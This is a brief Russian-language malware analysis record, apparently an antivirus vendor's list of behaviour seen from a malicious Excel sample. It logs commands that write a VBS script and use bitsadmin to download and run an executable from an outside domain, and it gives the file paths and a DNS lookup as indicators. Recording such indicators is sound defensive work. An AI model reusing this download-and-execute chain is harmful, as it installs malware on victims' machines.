Техническая информация
- '<SYSTEM32>\cmd.exe' /c @echo Set objShell = CreateObject("Wscript.Shell") > Re.vbs & @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download http://redfoxgrowth.com/9865567890-sk.exe %temp%\Re.vbs&%temp%\Re.vbs...
- %HOMEPATH%\documents\re.vbs
- <Текущая директория>\43f51000
- <PATH_SAMPLE>.xls
- DNS ASK re####growth.com
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Documents\Re.vbs"
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer 8 /download http://redfoxgrowth.com/9865567890-sk.exe %TEMP%\Re.vbs&%TEMP%\Re.vbs' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer 8 /download http://redfoxgrowth.com/9865567890-sk.exe %TEMP%\Re.vbs&%TEMP%\Re.vbs
- '<SYSTEM32>\bitsadmin.exe' /transfer 8 /download http://redfoxgrowth.com/9865567890-sk.exe %TEMP%\Re.vbs